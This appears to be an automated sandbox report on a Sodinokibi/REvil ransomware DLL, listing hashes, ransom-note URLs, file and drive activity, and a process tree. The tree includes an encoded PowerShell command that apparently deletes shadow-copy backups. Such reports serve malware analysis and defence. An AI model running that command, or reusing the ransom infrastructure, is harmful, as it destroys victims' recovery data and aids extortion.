Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
16-06-2024 00:12
Static task
static1
Behavioral task
behavioral1
Sample
b0d6817c4bcd8df8703a0aa8d2ba08e3_JaffaCakes118.dll
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
b0d6817c4bcd8df8703a0aa8d2ba08e3_JaffaCakes118.dll
Resource
win10v2004-20240508-en
General
-
Target
b0d6817c4bcd8df8703a0aa8d2ba08e3_JaffaCakes118.dll
-
Size
114KB
-
MD5
b0d6817c4bcd8df8703a0aa8d2ba08e3
-
SHA1
29c4c5e9c180c4c1241b69dd72ebdf5234628cbc
-
SHA256
f4f27a8d8607db742cdc40a1bffe2384f2a3bdeaa4f10c86d0e339f746a00036
-
SHA512
cbe7efb0bded61d4745783e482fcb4332d238855d175f3d15775ab3f8faa25151898611d46a44c38cd1b5b374eee6b892dd1feb03021031041cb444b0e55f69b
-
SSDEEP
1536:6Q2auIslFGhFtuAp75WeNMYLoRGp+K6fHICS4Ad1vdhC9fhHNPMf:3sI/hqsMYLoRK7b1TafHW
Malware Config
Extracted
C:\Users\3hl1vetq7-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EB42678C7DF80537
http://decryptor.cc/EB42678C7DF80537
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\I: rundll32.exe -
Drops file in Program Files directory 27 IoCs
description ioc Process File opened for modification \??\c:\program files\EnableCompress.pps rundll32.exe File opened for modification \??\c:\program files\GrantUnprotect.xht rundll32.exe File opened for modification \??\c:\program files\GroupUnpublish.mpeg2 rundll32.exe File opened for modification \??\c:\program files\CompleteStart.dib rundll32.exe File opened for modification \??\c:\program files\ReceiveSend.mpeg rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\3hl1vetq7-readme.txt rundll32.exe File opened for modification \??\c:\program files\DisablePublish.jtx rundll32.exe File opened for modification \??\c:\program files\RequestOut.xml rundll32.exe File opened for modification \??\c:\program files\TraceSkip.i64 rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\3hl1vetq7-readme.txt rundll32.exe File opened for modification \??\c:\program files\ReceiveStep.m3u rundll32.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\3hl1vetq7-readme.txt rundll32.exe File created \??\c:\program files (x86)\3hl1vetq7-readme.txt rundll32.exe File opened for modification \??\c:\program files\EnableInvoke.mpp rundll32.exe File opened for modification \??\c:\program files\GrantUnregister.mhtml rundll32.exe File created \??\c:\program files\3hl1vetq7-readme.txt rundll32.exe File opened for modification \??\c:\program files\ConvertFromConvert.mpeg rundll32.exe File opened for modification \??\c:\program files\SwitchTrace.search-ms rundll32.exe File opened for modification \??\c:\program files\StepProtect.xht rundll32.exe File opened for modification \??\c:\program files\CompressEdit.xml rundll32.exe File opened for modification \??\c:\program files\FormatWait.rtf rundll32.exe File opened for modification \??\c:\program files\GroupRevoke.wps rundll32.exe File opened for modification \??\c:\program files\StopConvert.snd rundll32.exe File opened for modification \??\c:\program files\SwitchSend.xlt rundll32.exe File opened for modification \??\c:\program files\CloseEnter.i64 rundll32.exe File opened for modification \??\c:\program files\GetConnect.vst rundll32.exe File opened for modification \??\c:\program files\HideShow.dwfx rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2108 rundll32.exe 1788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2108 rundll32.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeBackupPrivilege 2716 vssvc.exe Token: SeRestorePrivilege 2716 vssvc.exe Token: SeAuditPrivilege 2716 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 308 wrote to memory of 2108 308 rundll32.exe 28 PID 2108 wrote to memory of 1788 2108 rundll32.exe 29 PID 2108 wrote to memory of 1788 2108 rundll32.exe 29 PID 2108 wrote to memory of 1788 2108 rundll32.exe 29 PID 2108 wrote to memory of 1788 2108 rundll32.exe 29 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\b0d6817c4bcd8df8703a0aa8d2ba08e3_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\b0d6817c4bcd8df8703a0aa8d2ba08e3_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2364
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD5ab3a0e933621ca33373ee473e7569156
SHA1e72fcdc9cab52998f57e443f3c941b19635cbf3b
SHA256fe4f7e2749b388de2b1356a02358f4a9e20ec9d93444a80e0fc013c5816aa895
SHA512ecfd7df3fefb835a98caec9cc9de6035d5314f6eb95272a1865bb034f0334bbd63bef52e5820c0ca39c19127dc78c4ca4e18107c2374a031e2f4ad19139c08b0